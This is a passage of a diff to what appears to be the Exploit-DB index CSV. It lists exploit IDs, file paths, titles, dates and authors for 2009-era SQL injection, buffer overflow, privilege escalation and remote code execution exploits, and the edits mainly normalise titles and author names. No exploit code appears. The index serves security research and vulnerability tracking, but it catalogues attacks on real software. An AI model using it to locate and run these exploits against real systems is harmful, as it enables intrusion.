Exploit",2009-08-18,Mr.SQL,php,webapps,0 -9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself V2 (UploadID) SQL Injection Vuln",2009-08-18,Mr.SQL,php,webapps,0 +9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection Vuln",2009-08-18,Mr.SQL,php,webapps,0 9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 (WebKit Parsing of Floating Point Numbers) BOF PoC",2009-08-18,"Leon Juranic",multiple,dos,0 9455,platforms/windows/dos/9455.html,"MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem Arbitrary Add Admin User Vulnerability",2009-08-18,SuNHouSe2,hardware,remote,0 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 (.xpl) Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 -9459,platforms/php/webapps/9459.txt,"2WIRE Gateway (Auth Bypass & Password Reset) Vulnerabilities #2",2009-08-18,bugz,php,webapps,0 +9459,platforms/php/webapps/9459.txt,"2WIRE Gateway (Auth Bypass & Password Reset) Vulnerabilities #2",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"Autonomous LAN party <= 0.98.3 Remote File Inclusion Vulnerability",2009-08-18,cr4wl3r,php,webapps,0 9461,platforms/php/webapps/9461.txt,"E Cms <= 1.0 (index.php s) Remote SQL Injection Vulnerability",2009-08-18,Red-D3v1L,php,webapps,0 -9462,platforms/php/webapps/9462.txt,"Infinity <= 2.x.x options[style_dir] Local File Disclosure Vulnerability",2009-08-18,SwEET-DeViL,php,webapps,0 +9462,platforms/php/webapps/9462.txt,"Infinity <= 2.x.x options[style_dir] Local File Disclosure Vulnerability",2009-08-18,SwEET-DeViL,php,webapps,0 9463,platforms/php/webapps/9463.php,"Joomla Component MisterEstate Blind SQL Injection Exploit",2009-08-18,jdc,php,webapps,0 9464,platforms/php/webapps/9464.txt,"Fotoshow PRO (category) Remote SQL Injection Vulnerability",2009-08-18,darkmasking,php,webapps,0 9465,platforms/php/webapps/9465.txt,"phpfreeBB 1.0 Remote BLIND SQL Injection Vulnerability",2009-08-18,Moudi,php,webapps,0 @@ -8950,23 +8950,23 @@ id,file,description,date,author,platform,type,port 9484,platforms/php/webapps/9484.txt,"PHP Dir Submit (aid) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0 9485,platforms/php/webapps/9485.txt,"Cuteflow 2.10.3 edituser.php Security Bypass Vulnerability",2009-08-24,"Hever Costa Rocha",php,webapps,0 9486,platforms/windows/local/9486.pl,"KSP 2006 FINAL (.M3U) Universal Local Buffer Exploit (SEH)",2009-08-24,hack4love,windows,local,0 -9487,platforms/windows/dos/9487.pl,"Faslo Player 7.0 (.m3u) Local Buffer Overflow PoC",2009-08-24,hack4love,windows,dos,0 +9487,platforms/windows/dos/9487.pl,"Faslo Player 7.0 (.m3u) Local Buffer Overflow PoC",2009-08-24,hack4love,windows,dos,0 9488,platforms/freebsd/local/9488.c,"FreeBSD <= 6.1 kqueue() NULL pointer Dereference Local Root Exploit",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0 9489,platforms/multiple/local/9489.txt,"Multiple BSD Operating Systems setusercontext() Vulnerabilities",2009-08-24,Kingcope,multiple,local,0 9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 Remote File Disclosure / Info Disclosure Vulns",2009-08-24,IRCRASH,php,webapps,0 -9491,platforms/php/webapps/9491.txt,"Dow Group (new.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 +9491,platforms/php/webapps/9491.txt,"Dow Group (new.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional Local Kernel Buffer Overflow Exploit",2009-08-24,Heurs,windows,local,0 9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 Arbitrary Database Disclosure Vuln",2009-08-24,Septemb0x,php,webapps,0 9494,platforms/php/webapps/9494.txt,"humanCMS (Auth Bypass) SQL Injection Vulnerability",2009-08-24,next,php,webapps,0 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b (.wav File) Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 9496,platforms/windows/dos/9496.txt,"WAR-FTPD 1.65 (MKD/CD Requests) Denial of Service Vuln",2009-08-24,"opt!x hacker",windows,dos,0 -9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 (itechd.php productid) Blind SQL Injection Exploit",2009-08-24,Mr.SQL,php,webapps,0 +9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 (itechd.php productid) Blind SQL Injection Exploit",2009-08-24,Mr.SQL,php,webapps,0 9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 Information Disclsoure Vulnerabilities",2009-08-24,"Jean Trolleur",hardware,remote,0 9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 (rating.php) SQL Injection Vulnerability",2009-08-24,Bgh7,php,webapps,0 9500,platforms/windows/remote/9500.cpp,"NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit",2009-08-24,SimO-s0fT,windows,remote,0 9501,platforms/windows/local/9501.py,"Audacity <= 1.2 (.gro File) Universal BOF Exploit (egg hunter)",2009-08-24,mr_me,windows,local,0 9502,platforms/php/webapps/9502.txt,"Joomla Component com_ninjamonial 1.1 (testimID) SQL Injection Vuln",2009-08-24,"Chip D3 Bi0s",php,webapps,0 -9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 Multiple XSRF Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0 +9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple CSRF Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0 9504,platforms/php/webapps/9504.txt,"Joomla Component com_jtips 1.0.x (season) bSQL Injection Vuln",2009-08-24,"Chip D3 Bi0s",php,webapps,0 9505,platforms/php/webapps/9505.txt,"Geeklog <= 1.6.0sr1 Remote Arbitrary File Upload Vulnerability",2009-08-24,JaL0h,php,webapps,0 9506,platforms/windows/dos/9506.pl,"FLIP Flash Album Deluxe 1.8.407.1 (.fft File) Crash PoC",2009-08-24,the_Edit0r,windows,dos,0 @@ -9009,7 +9009,7 @@ id,file,description,date,author,platform,type,port 9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability",2009-08-31,Red-D3v1L,php,webapps,0 9545,platforms/linux/local/9545.c,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit (ppc)",2009-08-31,"Ramon Valle",linux,local,0 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0 -9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0 +9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0 9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b (.m3u/upl) Universal Local BOF Exploit (SEH)",2009-08-31,hack4love,windows,local,0 9549,platforms/windows/dos/9549.c,"MailEnable 1.52 HTTP Mail Service Stack BOF Exploit PoC",2009-08-31,"fl0 fl0w",windows,dos,0 9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23//5.1//6.0 (.hex) Universal Local BOF Exploits (SEH)",2009-08-31,hack4love,windows,local,0 @@ -9132,7 +9132,7 @@ id,file,description,date,author,platform,type,port 9671,platforms/windows/dos/9671.py,"Tuniac v.090517c (.PLS File) Local Crash PoC",2009-09-14,zAx,windows,dos,0 9672,platforms/windows/dos/9672.py,"PowerISO 4.0 Local Buffer Overflow PoC",2009-09-14,Dr_IDE,windows,dos,0 9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,Blake,windows,remote,6660 -9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk v3 (Auth Bypass) SQL Injection Vulnerability",2009-09-15,Snakespc,php,webapps,0 +9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Auth Bypass) SQL Injection Vulnerability",2009-09-15,Snakespc,php,webapps,0 9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln",2009-09-15,R3d-D3v!L,asp,webapps,0 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 /Scripts Access Restriction Bypass Vulnerability",2009-09-15,"Usman Saeed",windows,remote,0 9677,platforms/windows/dos/9677.c,"HERO SUPER PLAYER 3000 .M3U File Buffer Overflow POC",2009-09-15,"fl0 fl0w",windows,dos,0 @@ -9173,16 +9173,16 @@ id,file,description,date,author,platform,type,port 9714,platforms/multiple/webapps/9714.txt,"Mambo com_koesubmit 1.0.0 Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0 9715,platforms/multiple/webapps/9715.txt,"Zainu - Version 1.0 Remote SQL Injection Vulnerability",2009-09-18,Snakespc,multiple,webapps,0 9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System [header.php] Remote File Include",2009-09-18,"EA Ngel",multiple,webapps,0 -9717,platforms/windows/dos/9717.txt,"Xerver HTTP Server <= v4.32 Remote Denial of Service",2009-09-18,Dr_IDE,windows,dos,0 -9718,platforms/multiple/remote/9718.txt,"Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability",2009-09-18,Stack,multiple,remote,0 +9717,platforms/windows/dos/9717.txt,"Xerver HTTP Server <= 4.32 - Remote Denial of Service",2009-09-18,Dr_IDE,windows,dos,0 +9718,platforms/multiple/remote/9718.txt,"Xerver HTTP Server 4.32 - XSS / Directory Traversal Vulnerability",2009-09-18,Stack,multiple,remote,0 9719,platforms/multiple/webapps/9719.txt,"FanUpdate 2.2.1 show-cat.php SQL Injection Vulnerability",2009-09-18,"(In)Security Romania",multiple,webapps,0 9720,platforms/multiple/webapps/9720.txt,"FSphp 0.2.1 Multiple Remote File Inclusion Vulnerabilities",2009-09-18,NoGe,multiple,webapps,0 9721,platforms/multiple/webapps/9721.txt,"Joomla com_surveymanager SQL injection vulnerability - (stype)",2009-09-21,kaMtiEz,multiple,webapps,0 9722,platforms/multiple/webapps/9722.txt,"DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities",2009-09-21,HxH,multiple,webapps,0 9723,platforms/multiple/webapps/9723.txt,"Joomla com_jbudgetsmagic SQL injection vulnerability - (bid)",2009-09-21,kaMtiEz,multiple,webapps,0 9724,platforms/multiple/webapps/9724.txt,"BAnner ROtation System mini Multiple Remote File Inclusion",2009-09-21,"EA Ngel",multiple,webapps,0 -9726,platforms/multiple/webapps/9726.py,"cP Creator v2.7.1 Remote Sql Injection",2009-09-21,"Sina Yazdanmehr",multiple,webapps,0 -9727,platforms/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) Sql Injection",2009-09-21,ph1l1ster,multiple,webapps,0 +9726,platforms/multiple/webapps/9726.py,"cP Creator 2.7.1 - Remote Sql Injection",2009-09-21,"Sina Yazdanmehr",multiple,webapps,0 +9727,platforms/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) Sql Injection",2009-09-21,ph1l1ster,multiple,webapps,0 9728,platforms/multiple/webapps/9728.txt,"ProdLer <= 2.0 Remote File Include Vulnerability",2009-09-21,cr4wl3r,multiple,webapps,0 9729,platforms/multiple/webapps/9729.txt,"Loggix Project <= 9.4.5 Multiple Remote File Include Vulnerability",2009-09-21,cr4wl3r,multiple,webapps,0 9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 SQLi and persistent XSS",2009-09-21,learn3r,multiple,webapps,0 @@ -9233,17 +9233,17 @@ id,file,description,date,author,platform,type,port 9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9842,platforms/php/local/9842.txt,"PHP 5.3.0 pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9843,platforms/multiple/remote/9843.txt,"Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection",2009-11-05,"Core Security",multiple,remote,0 -9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0 +9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0 9845,platforms/osx/local/9845.c,"OSX 10.5.6-10.5.7 ptrace mutex DoS",2009-11-05,prdelka,osx,local,0 9846,platforms/php/webapps/9846.txt,"Endonessia CMS 8.4 Loccal File Inclusion",2009-11-04,s4r4d0,php,webapps,0 -9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <=1.14 Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 +9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 SQL Injection",2009-11-03,puret_t,php,webapps,0 9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0 9851,platforms/windows/remote/9851.pl,"Xion Audio Player 1.0 121 .m3u file Buffer Overflow",2009-11-03,corelanc0d3r,windows,remote,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 'SITE INDEX' Command Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 9853,platforms/windows/remote/9853.rb,"Symantec ConsoleUtilities ActiveX Buffer Overflow",2009-11-02,"Nikolas Sotiriu",windows,remote,0 9854,platforms/php/webapps/9854.txt,"TFTgallery .13 Directory Traversal Exploit",2009-11-02,Blake,php,webapps,0 -9855,platforms/php/webapps/9855.txt,"Geeklog <= v1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 +9855,platforms/php/webapps/9855.txt,"Geeklog <= 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 xss",2009-10-05,"Sébastien Duquette",asp,webapps,0 9858,platforms/hardware/remote/9858.txt,"Riorey RIOS Hardcoded Password Vulnerability 4.7.0",2009-10-08,"Marek Kroemeke",hardware,remote,8022 @@ -9257,7 +9257,7 @@ id,file,description,date,author,platform,type,port 9867,platforms/php/webapps/9867.txt,"Amiro.CMS <= 5.4.0.0 folder disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 9871,platforms/windows/local/9871.txt,"Boloto Media Player 1.0.0.9 pls file DoS",2009-10-27,Dr_IDE,windows,local,0 9872,platforms/multiple/webapps/9872.txt,"Boxalino 09.05.25-0421 Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 -9873,platforms/windows/webapps/9873.txt,"Cherokee <=0.5.4 directory traversal",2009-10-28,Dr_IDE,windows,webapps,0 +9873,platforms/windows/webapps/9873.txt,"Cherokee <= 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0 9874,platforms/windows/webapps/9874.txt,"Cherokee web server 0.5.4 DoS",2009-10-26,"Usman Saeed",windows,webapps,0 9875,platforms/php/webapps/9875.txt,"CubeCart 4 Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0 9876,platforms/php/webapps/9876.txt,"DedeCMS 5.1 SQL Injection",2009-10-14,"Securitylab Security Research",php,webapps,0 @@ -9288,7 +9288,7 @@ id,file,description,date,author,platform,type,port 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 SQL Injection Vulnerability",2009-10-30,"Securitylab Research",asp,webapps,0 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 - 10.2.0.4 AUTH_SESSKEY length validation exploit",2009-10-30,"Dennis Yurichev",windows,remote,1521 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0 -9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <=2.3.1 Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0 +9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0 9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0 9910,platforms/php/webapps/9910.rb,"Dogfood CRM 2.0.10 spell.php Command Injection",2009-03-03,LSO,php,webapps,0 @@ -9332,7 +9332,7 @@ id,file,description,date,author,platform,type,port 9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0 9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129 9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723 -9953,platforms/linux/remote/9953.rb,"MySQL <=6.0 yaSSL <= 1.7.5 Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306 +9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306 9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 privilege escalation",2009-10-20,trompele,hardware,local,0 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0 @@ -9347,14 +9347,14 @@ id,file,description,date,author,platform,type,port 9965,platforms/php/webapps/9965.txt,"RunCMS 2ma post.php SQL injection",2009-10-26,bookoo,php,webapps,0 9966,platforms/windows/remote/9966.txt,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-02,"Nikolas Rangos",windows,remote,80 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 -9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0 +9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"Laurent Gaffie",multiple,dos,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive Service privilege escalation",2009-10-20,bellick,windows,local,0 9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0 9972,platforms/multiple/remote/9972.c,"SSL MITM Vulnerability",2009-11-09,"Pavel Kankovsky",multiple,remote,0 9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 privilege escalation",2009-10-17,prdelka,multiple,local,0 9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 -9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS XSRF",2009-11-16,"Alexey Sintsov",hardware,webapps,80 -9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server <=4.4.17, <=5.0.65 xss",2009-10-23,"Davide Canali",php,webapps,0 +9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS and CSRF",2009-11-16,"Alexey Sintsov",hardware,webapps,80 +9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server <= 4.4.17 & <= 5.0.65 - XSS",2009-10-23,"Davide Canali",php,webapps,0 9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 file disclosure",2009-10-22,"Janek Vind",php,webapps,0 9980,platforms/hardware/webapps/9980.txt,"Websense Email Security DoS",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 9981,platforms/hardware/webapps/9981.txt,"Websense Email Security xss",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 @@ -9384,7 +9384,7 @@ id,file,description,date,author,platform,type,port 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0 10008,platforms/windows/remote/10008.txt,"EMC Captiva QuickScan Pro 4.6 sp1 and EMC Documentum ApllicationXtender Desktop 5.4",2009-09-30,Pyrokinesis,windows,remote,0 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0 -10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter v1.1 (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 +10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 10012,platforms/multiple/webapps/10012.py,"html2ps 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 - 4.2-beta1 Multiple XSS",2009-10-02,CoreLabs,jsp,webapps,0 @@ -9404,7 +9404,7 @@ id,file,description,date,author,platform,type,port 10027,platforms/linux/remote/10027.rb,"PeerCast <= 0.1216",2006-03-08,MC,linux,remote,7144 10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 , WRT54GS < 1.05.2 apply.cgi Buffer Overflow",2005-09-13,"Raphael Rigo",cgi,remote,80 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947 -10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 Command Injection Vulnerability",2009-07-20,"H D Moore",linux,remote,80 +10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection Vulnerability",2009-07-20,"H D Moore",linux,remote,80 10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443 10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787 10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter Command Execution",2001-09-01,"H D Moore",irix,remote,515 @@ -9421,19 +9421,19 @@ id,file,description,date,author,platform,type,port 10046,platforms/php/webapps/10046.txt,"Dazzle Blast Remote File Inclusion",2009-10-12,NoGe,php,webapps,0 10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80 10049,platforms/php/webapps/10049.pl,"EZsneezyCal CMS 95.1-95.2 File Inclusion Vulnerability",2009-10-12,kaMtiEz,php,webapps,0 -10050,platforms/php/webapps/10050.pl,"EZRecipeZee CMS version 91 File Inclusion Vulnerability",2009-10-12,kaMtiEz,php,webapps,0 -10051,platforms/php/webapps/10051.txt,"QuickCart 3.x xss, xsrf, Local File Inclusion, Directory Traversal",2009-10-08,kl3ryk,php,webapps,0 +10050,platforms/php/webapps/10050.pl,"EZRecipeZee CMS 91 - File Inclusion Vulnerability",2009-10-12,kaMtiEz,php,webapps,0 +10051,platforms/php/webapps/10051.txt,"QuickCart 3.x - XSS/CSRF/LFI/Directory Traversal",2009-10-08,kl3ryk,php,webapps,0 10052,platforms/php/webapps/10052.txt,"The BMW inventory.php SQL Injection",2009-10-08,Dazz,php,webapps,0 10053,platforms/windows/remote/10053.txt,"httpdx 1.4 Get Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 -10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp<=14 Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 +10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp <= 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer xss",2009-07-04,sh2kerr,hardware,remote,80 10056,platforms/windows/remote/10056.py,"Ada Image Server <= 0.6.7 imgsrv.exe Buffer Overflow",2009-10-07,Blake,windows,remote,1235 10057,platforms/php/webapps/10057.txt,"Aiocp 1.4.001 File Inclusion Vulnerability",2009-10-07,"Hadi Kiamarsi",php,webapps,0 10058,platforms/php/webapps/10058.pl,"Joomla Recerca component SQL Injection",2009-10-07,"Don Tukulesto",php,webapps,0 -10059,platforms/jsp/webapps/10059.txt,"McAfee Network Security Manager <5.1.11.8.1 Information Disclosure Vulnerability",2009-11-12,"Daniel King",jsp,webapps,0 +10059,platforms/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure Vulnerability",2009-11-12,"Daniel King",jsp,webapps,0 10060,platforms/linux/local/10060.sh,"Geany .18 Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0 -10061,platforms/jsp/webapps/10061.txt,"McAfee Network Security Manager <5.1.11.8.1 Multiple Cross Site Scripting Vulnerabilities",2009-11-12,"Daniel King",jsp,webapps,0 -10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,"Matteo Memelli",windows,dos,389 +10061,platforms/jsp/webapps/10061.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross Site Scripting Vulnerabilities",2009-11-12,"Daniel King",jsp,webapps,0 +10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389 10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0 @@ -9449,8 +9449,8 @@ id,file,description,date,author,platform,type,port 10078,platforms/osx/local/10078.c,"VMWare Fusion <= 2.0.5 vmx86 kext local PoC",2009-10-02,mu-b,osx,local,0 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser remote command execution",2009-10-01,Pyrokinesis,windows,remote,0 10080,platforms/windows/remote/10080.txt,"Oracle Network Authentication CVE-2009-1979 Remote Buffer Overflow Vulnerability",2009-11-09,"Dennis Yurichev",windows,remote,1521 -10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS <=1.1 Remote File Access Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 -10082,platforms/php/webapps/10082.txt,"PBBoard <=2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0 +10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS <= 1.1 - Remote File Access Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 +10082,platforms/php/webapps/10082.txt,"PBBoard <= 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0 10083,platforms/php/remote/10083.txt,"PHP <=5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 10084,platforms/windows/local/10084.txt,"Quick Heal v.10.00 SP1 Local Privilege Escalation Vulnerability",2009-10-13,"Maxim A. Kulakov",windows,local,0 10085,platforms/jsp/webapps/10085.txt,"ToutVirtual VirtualIQ Pro 3.2 Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0 @@ -9466,10 +9466,10 @@ id,file,description,date,author,platform,type,port 10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 - 3.3.5 Format String And Security Bypass Vulnerabilities",2009-11-13,"Jeremy Allison",multiple,remote,0 10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0 10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 -10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer Overflow",2009-11-16,"Matteo Memelli",windows,remote,0 -10099,platforms/windows/remote/10099.py,"HP Power Manager Administration Universal Buffer Overflow Exploit",2009-11-16,"Matteo Memelli",windows,remote,80 +10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer 